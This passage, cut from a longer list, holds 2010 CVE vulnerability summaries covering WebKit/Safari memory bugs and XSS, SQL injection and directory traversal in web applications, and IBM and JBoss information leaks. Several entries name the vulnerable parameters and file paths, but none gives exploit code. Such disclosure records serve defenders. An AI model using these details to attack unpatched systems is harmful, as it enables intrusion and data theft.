r56380, as used in Qt and other products, allows remote websockets servers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an upgrade header that is long and invalid. [CVE-2010-1764] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, follows multiple redirections during form submission, which allows remote web servers to obtain sensitive information by recording the form data. [CVE-2010-1763] Unspecified vulnerability in WebKit in Apple iTunes before 9.2 on Windows has unknown impact and attack vectors, a different vulnerability than CVE-2010-1387 and CVE-2010-1769. [CVE-2010-1762] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving HTML in a TEXTAREA element. [CVE-2010-1761] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving HTML document subtrees. [CVE-2010-1760] loader/DocumentThreadableLoader.cpp in the XMLHttpRequest implementation in WebCore in WebKit before r58409 does not properly handle credentials during a cross-origin synchronous request, which has unspecified impact and remote attack vectors, aka rdar problem 7905150. [CVE-2010-1759] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the Node.normalize method. [CVE-2010-1758] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving DOM Range objects. [CVE-2010-1755] Safari in Apple iOS before 4 on the iPhone and iPod touch does not properly implement the Accept Cookies preference, which makes it easier for remote web servers to track users via a cookie. [CVE-2010-1749] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the Cascading Style Sheets (CSS) run-in property and multiple invocations of a destructor for a child element that has been referenced multiple times. [CVE-2010-1746] Multiple cross-site scripting (XSS) vulnerabilities in the Table JX (com_grid) component for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) data_search and (2) rpp parameters to index.php. [CVE-2010-1742] Cross-site scripting (XSS) vulnerability in projects.php in Scratcher allows remote attackers to inject arbitrary web script or HTML via the show parameter. [CVE-2010-1736] KrM Haber 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for d_atabase/Krmdb.mdb. [CVE-2010-1729] WebKit.dll in WebKit, as used in Safari.exe 4.531.9.1 in Apple Safari, allows remote attackers to cause a denial of service (application crash) via JavaScript that writes <marquee> sequences in an infinite loop. [CVE-2010-1724] Multiple cross-site scripting (XSS) vulnerabilities in Zikula Application Framework 1.2.2, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) func parameter to index.php, or the (2) lang parameter to index.php, which is not properly handled by ZLanguage.php. [CVE-2010-1712] Multiple cross-site scripting (XSS) vulnerabilities in base/Comments.php in Webmobo WB News 2.3.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name and possibly (2) message parameters. NOTE: some of these details are obtained from third party information. [CVE-2010-1711] Cross-site scripting (XSS) vulnerability in carga_foto_al.php in Siestta 2.0, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the usuario parameter. [CVE-2010-1709] Multiple cross-site scripting (XSS) vulnerabilities in upload.cgi in G5-Scripts Auto-Img-Gallery 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) user and (2) pass parameters. [CVE-2010-1707] Multiple cross-site scripting (XSS) vulnerabilities in register.php in Piwigo 2.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) login and (2) mail_address parameters. [CVE-2010-1703] Multiple cross-site scripting (XSS) vulnerabilities in index_search.php in 2daybiz Polls (aka Advanced Poll) Script allow remote attackers to inject arbitrary web script or HTML via the (1) category parameter or (2) search field. [CVE-2010-1667] Multiple cross-site scripting (XSS) vulnerabilities in Mahara before 1.0.15, 1.1.x before 1.1.9, and 1.2.x before 1.2.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1662] Cross-site scripting (XSS) vulnerability in acpmoderate.php in PHP-Quick-Arcade (PHPQA) 3.0.21 allows remote attackers to inject arbitrary web script or HTML via the serv parameter. [CVE-2010-1655] Cross-site scripting (XSS) vulnerability in User/User_ChkLogin.asp in PowerEasy 2006 and PowerEasy SiteWeaver 6.8 allows remote attackers to inject arbitrary web script or HTML via the ComeUrl parameter. [CVE-2010-1651] IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.31 and 7.0.x before 7.0.0.11, when Basic authentication and SIP tracing (aka full trace logging for SIP) are enabled, logs the entirety of all inbound and outbound SIP messages, which allows local users to obtain sensitive information by reading the trace log. [CVE-2010-1650] IBM WebSphere Application Server (WAS) 6.0.x before 6.0.2.41, 6.1.x before 6.1.0.31, and 7.0.x before 7.0.0.11, when the -trace option (aka debugging mode) is enabled, executes debugging statements that print string representations of unspecified objects, which allows attackers to obtain sensitive information by reading the trace output. [CVE-2010-1649] Multiple cross-site scripting (XSS) vulnerabilities in the back end in Joomla! 1.5 through 1.5.17 allow remote attackers to inject arbitrary web script or HTML via unknown vectors related to "various administrator screens," possibly the search parameter in administrator/index.php. [CVE-2010-1648] Cross-site request forgery (CSRF) vulnerability in the login interface in MediaWiki 1.15 before 1.15.4 and 1.16 before 1.16 beta 3 allows remote attackers to hijack the authentication of users for requests that (1) create accounts or (2) reset passwords, related to the Special:Userlogin form. [CVE-2010-1647] Cross-site scripting (XSS) vulnerability in MediaWiki 1.15 before 1.15.4 and 1.16 before 1.16 beta 3 allows remote attackers to inject arbitrary web script or HTML via crafted Cascading Style Sheets (CSS) strings that are processed as script by Internet Explorer. [CVE-2010-1644] Multiple cross-site scripting (XSS) vulnerabilities in Cacti before 0.8.7f, as used in Red Hat High Performance Computing (HPC) Solution and other products, allow remote attackers to inject arbitrary web script or HTML via the (1) hostname or (2) description parameter to host.php, or (3) the host_id parameter to data_sources.php. [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService. [CVE-2010-1629] Cross-site scripting (XSS) vulnerability in Phorum before 5.2.15 allows remote attackers to inject arbitrary web script or HTML via an invalid email address. [CVE-2010-1625] Cross-site scripting (XSS) vulnerability in LXR Cross Referencer before 0.9.7 allows remote attackers to inject arbitrary web script or HTML via vectors related to the search body and the results page for a search, a different vulnerability than CVE-2009-4497 and CVE-2010-1448. [CVE-2010-1619] Cross-site scripting (XSS) vulnerability in the fix_non_standard_entities function in the KSES HTML text cleaning library (weblib.php), as used in Moodle 1.8.x before 1.8.12 and 1.9.x before 1.9.8, allows remote attackers to inject arbitrary web script or HTML via crafted HTML entities. [CVE-2010-1618] Cross-site scripting (XSS) vulnerability in the phpCAS client library before 1.1.0, as used in Moodle 1.8.x before 1.8.12 and 1.9.x before 1.9.8, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, which is not properly handled in an error message. [CVE-2010-1614] Multiple cross-site scripting (XSS) vulnerabilities in Moodle 1.8.x before 1.8.12 and 1.9.x before 1.9.8 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the Login-As feature or (2) when the global search feature is enabled, unspecified global search forms in the Global Search Engine. NOTE: vector 1 might be resultant from a cross-site request forgery (CSRF) vulnerability. [CVE-2010-1609] Cross-site scripting (XSS) vulnerability in SAP NetWeaver 2004 before SP21 and 2004s before SP13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1606] Multiple cross-site scripting (XSS) vulnerabilities in NCT Jobs Portal Script allow remote attackers to inject arbitrary web script or HTML via the (1) search, (2) Keywords, (3) Tags, or (4) Desired City field. [CVE-2010-1599] SQL injection vulnerability in loadorder.php in NKInFoWeb 2.5 and 5.2.2.0 allows remote attackers to execute arbitrary SQL commands via the id_sp parameter. [CVE-2010-1594] Multiple cross-site scripting (XSS) vulnerabilities in ocsreports/index.php in OCS Inventory NG 1.02.1 allow remote attackers to inject arbitrary web script or HTML via (1) the query string, (2) the BASE parameter, or (3) the ega_1 parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-1593] Multiple cross-site scripting (XSS) vulnerabilities in SilverStripe before 2.3.5 allow remote attackers to inject arbitrary web script or HTML via (1) the CommenterURL parameter to PostCommentForm, and in the Forum module before 0.2.5 in SilverStripe before 2.3.5 allow remote attackers to inject arbitrary web script or HTML via (2) the Search parameter to forums/search (aka the search script). [CVE-2010-1590] Cross-site scripting (XSS) vulnerability in shopsessionsubs.asp in Rocksalt International VP-ASP Shopping Cart 6.50 and earlier might allow remote attackers to inject arbitrary web script or HTML via the client's DNS hostname (aka the REMOTE_HOST variable), related to the CookielessGenerateFilename and CookielessReadFile functions. [CVE-2010-1588] SQL injection vulnerability in the Getwebsess function in shopsessionsubs.asp in Rocksalt International VP-ASP Shopping Cart 6.50 and earlier allows remote attackers to execute arbitrary SQL commands via the websess parameter. [CVE-2010-1586] Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter. [CVE-2010-1584] Cross-site scripting (XSS) vulnerability in the Context module before 6.x-2.0-rc4 for Drupal allows remote authenticated users, with Administer Blocks privileges, to inject arbitrary web script or HTML via a block description. [CVE-2010-1557] Multiple cross-site scripting (XSS) vulnerabilities in HP Insight Control Server Migration before 6.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1543] Cross-site scripting (XSS) vulnerability in the eTracker module before 6.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML by appending a crafted string to an arbitrary URL associated with the Drupal site. [CVE-2010-1541] Multiple cross-site scripting (XSS) vulnerabilities in DFD Cart 1.198, 1.197, and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) category and (2) list_quantity parameters to index.php, and the (3) category parameter to your.order.php. [CVE-2010-1539] Cross-site scripting (XSS) vulnerability in the Workflow module 5.x-2.x before 5.x-2.6 and 6.x-1.x before 6.x-1.4 for Drupal, when used with the Token module, might allow remote authenticated users to inject arbitrary web script or HTML via a certain Comment field. [CVE-2010-1536] Cross-site scripting (XSS) vulnerability in the AddThis Button module 5.x before 5.x-2.2 and 6.x before 6.x-2.9 for Drupal allows remote authenticated users, with administer addthis privileges, to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1527] Stack-based buffer overflow in Novell iPrint Client before 5.44 allows remote attackers to execute arbitrary code via a long call-back-url parameter in an op-client-interface-version action. [CVE-2010-1520] Cross-site scripting (XSS) vulnerability in logout.php in TaskFreak! Original multi user before 0.6.4 allows remote attackers to inject arbitrary web script or HTML via the tznMessage parameter. [CVE-2010-1515] Multiple cross-site scripting (XSS) vulnerabilities in index.php in TomatoCMS 2.0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) keyword or (2) article-id parameter in conjunction with a /admin/news/article/list PATH_INFO [CVE-2010-1507] WebYaST in yast2-webclient in SUSE Linux Enterprise (SLE) 11 on the WebYaST appliance uses a fixed secret key that is embedded in the appliance's image, which allows remote attackers to spoof session cookies by leveraging knowledge of this key. [CVE-2010-1504] Cross-site scripting (XSS) vulnerability in Google Chrome before 4.1.249.1059 allows remote attackers to inject arbitrary web script or HTML via vectors related to a chrome://downloads URI. [CVE-2010-1503] Cross-site scripting (XSS) vulnerability in Google Chrome before 4.1.249.1059 allows remote attackers to inject arbitrary web script or HTML via vectors related to a chrome://net-internals URI. [CVE-2010-1497] Cross-site scripting (XSS) vulnerability in download_proc.php in dl_stats before 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2010-1489] The XSS Filter in Microsoft Internet Explorer 8 does not properly perform neutering for the SCRIPT tag, which allows remote attackers to conduct cross-site scripting (XSS) attacks against web sites that have no inherent XSS vulnerabilities, a different issue than CVE-2009-4074. [CVE-2010-1486] Multiple cross-site scripting (XSS) vulnerabilities in _invoice.asp in CactuShop before 6.155 allow remote attackers to inject arbitrary web script or HTML via the (1) billing address or (2) shipping address. [CVE-2010-1482] Cross-site scripting (XSS) vulnerability in admin/editprefs.php in the backend in CMS Made Simple (CMSMS) before 1.7.1 might allow remote attackers to inject arbitrary web script or HTML via the date_format_string parameter. [CVE-2010-1481] Cross-site scripting (XSS) vulnerability in the table feature in PmWiki 2.2.15 allows remote authenticated users to inject arbitrary web script or HTML via the width attribute. [CVE-2010-1470] Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. [CVE-2010-1464] Multiple cross-site scripting (XSS) vulnerabilities in WebAsyst Shop-Script FREE allow remote attackers to inject arbitrary web script or HTML via the (1) currency_id_left, (2) currency_id_right, (3) darkcolor, (4) lightcolor, (5) middlecolor, and (6) w parameters. [CVE-2010-1463] Multiple SQL injection vulnerabilities in WebAsyst Shop-Script FREE allow attackers to execute arbitrary SQL commands via the (1) add2cart, (2) c_id, (3) categoryID, (4) list_price, (5) name, (6) new_offer, (7) price, (8) product_code, (9) productID, (10) rating, and (11) save_product parameters. [CVE-2010-1462] Directory traversal vulnerability in WebAsyst Shop-Script FREE has unknown impact and attack vectors via the sub parameter. [CVE-2010-1454] com.springsource.tcserver.serviceability.rmi.JmxSocketListener in VMware SpringSource tc Server Runtime 6.0.19 and 6.0.20 before 6.0.20.D, and 6.0.25.A before 6.0.25.A-SR01, does not properly enforce the requirement for an encrypted (aka s2enc) password, which allows remote attackers to obtain JMX interface access via a blank password. [CVE-2010-1453] Cross-site scripting (XSS) vulnerability in the Login form in Piwik 0.1.6 through 0.5.5 allows remote attackers to inject arbitrary web script or HTML via the form_url parameter. [CVE-2010-1448] Cross-site scripting (XSS) vulnerability in lib/LXR/Common.pm in LXR Cross Referencer before 0.9.8 allows remote attackers to inject arbitrary web script or HTML via vectors related to a string in the search page's TITLE element, a different vulnerability than CVE-2009-4497 and CVE-2010-1625. [CVE-2010-1438] Web Application Finger Printer (WAFP) 0.01-26c3 uses fixed pathnames under /tmp for temporary files and directories, which (1) allows local users to cause a denial of service (application outage) by creating a file with a pathname that the product expects is available for its own internal use, (2) allows local users to overwrite arbitrary files via symlink attacks on certain files in /tmp, (3) might allow local users to delete arbitrary files and directories via a symlink attack on a directory under /tmp, and (4) might make it easier for local users to obtain sensitive information by reading files in a directory under /tmp, related to (a) lib/wafp_pidify.rb, (b) utils/generate_wafp_fingerprint.sh, (c) utils/online_update.sh, and (d) utils/extract_from_db.sh. [CVE-2010-1429] Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression. [CVE-2010-1428] The Web Console (aka web-console) in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to obtain sensitive information via an unspecified request that uses a different method. [CVE-2010-1427] Cross-site scripting (XSS) vulnerability in the SearchHighlight plugin in MODx Evolution before 1.0.3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to AjaxSearch. [CVE-2010-1426] SQL injection vulnerability in MODx Evolution before 1.0.3 allows remote attackers to execute arbitrary SQL commands via unknown vectors related to WebLogin. [CVE-2010-1422] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle changes to keyboard focus that occur during processing of key press events, which allows remote attackers to force arbitrary key presses via a crafted HTML document. [CVE-2010-1421] The execCommand JavaScript function in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly restrict remote execution of clipboard commands, which allows remote attackers to modify the clipboard via a crafted HTML document. [CVE-2010-1420] Cross-site scripting (XSS) vulnerability in CFNetwork in Apple Safari before 5.0.6 allows remote attackers to inject arbitrary web script or HTML via a crafted text/plain file. [CVE-2010-1419] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows user-assisted remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving a certain window close action that occurs during a drag-and-drop operation. [CVE-2010-1418] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via a FRAME element with a SRC attribute composed of a javascript: sequence preceded by spaces. [CVE-2010-1417] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via HTML content that contains multiple :after pseudo-selectors. [CVE-2010-1416] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly restrict the reading of a canvas that contains an SVG image pattern from a different web site, which allows remote attackers to read images from other sites via a crafted canvas, related to a "cross-site image capture issue." [CVE-2010-1415] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle libxml contexts, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to an "API abuse issue." [CVE-2010-1414] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the removeChild DOM method. [CVE-2010-1413] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends NTLM credentials in cleartext in unspecified circumstances, which allows man-in-the-middle attackers to obtain sensitive information via unspecified vectors. [CVE-2010-1412] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to hover events. [CVE-2010-1410] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via an SVG document with nested use elements. [CVE-2010-1409] Incomplete blacklist vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to trigger disclosure of data over IRC via vectors involving an IRC service port. [CVE-2010-1408] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to bypass intended restrictions on outbound connections to "non-default TCP ports" via a crafted port number, related to an "integer truncation issue." NOTE: this may overlap CVE-2010-1099. [CVE-2010-1407] WebKit in Apple iOS before 4 on the iPhone and iPod touch does not properly implement the history.replaceState method in certain situations involving IFRAME elements, which allows remote attackers to obtain sensitive information via a crafted HTML document. [CVE-2010-1406] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends an https URL in the Referer header of an http request in certain circumstances involving https to http redirection, which allows remote HTTP servers to obtain potentially sensitive information via standard HTTP logging, a related issue to CVE-2010-0660. [CVE-2010-1405] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML element that has custom vertical positioning. [CVE-2010-1404] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an SVG document that contains recursive Use elements, which are not properly handled during page deconstruction. [CVE-2010-1403] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses uninitialized memory during the handling of a use element in an SVG document, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted document containing XML that triggers a parsing error, related to ProcessInstruction. [CVE-2010-1402] Double free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to an event listener in an SVG document, related to duplicate event listeners, a timer, and an AnimateTransform object. [CVE-2010-1401] Use-after-free vulnerability in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving the :first-letter pseudo-element. [CVE-2010-1400] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving caption elements. [CVE-2010-1399] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses uninitialized memory during a selection change on a form input element, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document. [CVE-2010-1398] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly perform ordered list insertions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document, related to the insertion of an unspecified element into an editable container and the access of an uninitialized element. [CVE-2010-1397] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to a layout change during selection rendering and the DOCUMENT_POSITION_DISCONNECTED attribute in a container of an unspecified type. [CVE-2010-1396] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the contentEditable attribute and removing container elements. [CVE-2010-1395] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving DOM constructor objects, related to a "scope management issue." [CVE-2010-1394] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving HTML document fragments. [CVE-2010-1393] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to discover sensitive URLs via an HREF attribute associated with a redirecting URL. [CVE-2010-1392] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to HTML buttons and the first-letter CSS style. [CVE-2010-1391] Multiple directory traversal vulnerabilities in the (a) Local Storage and (b) Web SQL database implementations in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allow remote attackers to create arbitrary database files via vectors involving a (1) %2f and .. (dot dot) or (2) %5c and .. (dot dot) in a URL. [CVE-2010-1390] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors related to improper UTF-7 canonicalization, and lack of termination of a quoted string in an HTML document. [CVE-2010-1389] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors involving a (1) paste or (2) drag-and-drop operation for a selection. [CVE-2010-1388] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6, and before 4.1 on Mac OS X 10.4, does not properly handle clipboard (1) drag and (2) paste operations for URLs, which allows user-assisted remote attackers to read arbitrary files via a crafted HTML document. [CVE-2010-1387] Use-after-free vulnerability in JavaScriptCore in WebKit in Apple iTunes before 9.2 on Windows, and Apple iOS before 4 on the iPhone and iPod touch, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to page transitions, a different vulnerability than CVE-2010-1763 and CVE-2010-1769. [CVE-2010-1386] page/Geolocation.cpp in WebCore in WebKit before r56188 and before 1.2.5 does not properly restrict access to the lastPosition function, which has unspecified impact and remote attack vectors, aka rdar problem 7746357. [CVE-2010-1383] CFNetwork in Apple Safari before 5.0.6 on Windows allows remote web servers to execute arbitrary code by replaying the NTLM credentials of a client user, related to a "credential reflection" issue. [CVE-2010-1382] Cross-site scripting (XSS) vulnerability in Wiki Server in Apple Mac OS X 10.5.8, and 10.6 before 10.6.4, allows remote authenticated users to inject arbitrary web script or HTML via crafted Wiki content, related to lack of a charset field. [CVE-2010-1373] Cross-site scripting (XSS) vulnerability in Help Viewer in Apple Mac OS X 10.6 before 10.6.4 allows remote attackers to inject arbitrary web script or HTML via a crafted help: URL, related to "URL parameters in HTML content." [CVE-2010-1371] Cross-site scripting (XSS) vulnerability in signup.asp in Pre Classified Listings ASP allows remote attackers to inject arbitrary web script or HTML via the address parameter. [CVE-2010-1367] Multiple cross-site scripting (XSS) vulnerabilities in admin/admin_login.php in Uiga Fan Club, as downloaded on 20100310, allow remote attackers to inject arbitrary web script or HTML via the (1) admin_name and (2) admin_password parameters. NOTE: the provenance of this information is unknown [CVE-2010-1362] Cross-site scripting (XSS) vulnerability in the Own Term module 6.x-1.0 for Drupal allows remote authenticated users, with "create additional terms" privileges, to inject arbitrary web script or HTML via the term description field in a term listing page. [CVE-2010-1361] Cross-site scripting (XSS) vulnerability in shop/USER_ARTIKEL_HANDLING_AUFRUF.php in PHPepperShop 2.5 allows remote attackers to inject arbitrary web script or HTML via the darstellen parameter. [CVE-2010-1358] Cross-site scripting (XSS) vulnerability in the Bibliography (Biblio) module 5.x through 5.x-1.17 and 6.x through 6.x-1.9 for Drupal allows remote authenticated users, with "administer biblio" privileges, to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1357] Cross-site scripting (XSS) vulnerability in editors/logindialogue.php in SBD Directory Software 4.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2010-1355] Cross-site scripting (XSS) vulnerability on the TANDBERG Video Communication Server (VCS) before X5.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Reference ID 66316. [CVE-2010-1348] Unspecified vulnerability in the login process in IBM WebSphere Portal 6.0.1.1, and 6.1.0.x before 6.1.0.3 Cumulative Fix 03, has unknown impact and remote attack vectors. [CVE-2010-1339] Cross-site scripting (XSS) vulnerability in ts_other.php in the Teamsite Hack plugin 3.0 and earlier for WoltLab Burning Board allows remote attackers to inject arbitrary web script or HTML via the userid parameter in a modboard action, which is not properly handled in a forced SQL error message. NOTE: the provenance of this information is unknown [CVE-2010-1333] Multiple cross-site scripting (XSS) vulnerabilities in Almas Inc. Compiere J300_A02 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1332] Cross-site scripting (XSS) vulnerability in PrettyBook PrettyFormMail allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1329] Imperva SecureSphere Web Application Firewall and Database Firewall 5.0.0.5082 through 7.0.0.7078 allow remote attackers to bypass intrusion-prevention functionality via a request that has an appended long string containing an unspecified manipulation. [CVE-2010-1328] Multiple cross-site scripting (XSS) vulnerabilities in TornadoStore 1.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tipo or (2) destino parameter to login_registrese.php3 in the Services section, (3) the rubro parameter to precios.php3 in the Products section, (4) the arti parameter to recomenda_articulo.php3 in the Products section, (5) the descrip parameter in a profile action to control/abm_det.php3 in the e-Commerce section, (6) the tit parameter in a delivery_courier action to control/abm_list.php3 in the e-Commerce section, or (7) the tit parameter in an usuario action to control/abm_det.php3 in the e-Commerce section. [CVE-2010-1315] Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information. [CVE-2010-1303] Multiple cross-site scripting (XSS) vulnerabilities in the Taxonomy Filter module 6.x before 6.x-1.1 for Drupal allow remote authenticated users, with administer taxonomy permissions or create node permissions when free tagging is enabled, to inject arbitrary web script or HTML via vocabulary (1) names, (2) terms, and (3) filter menus. 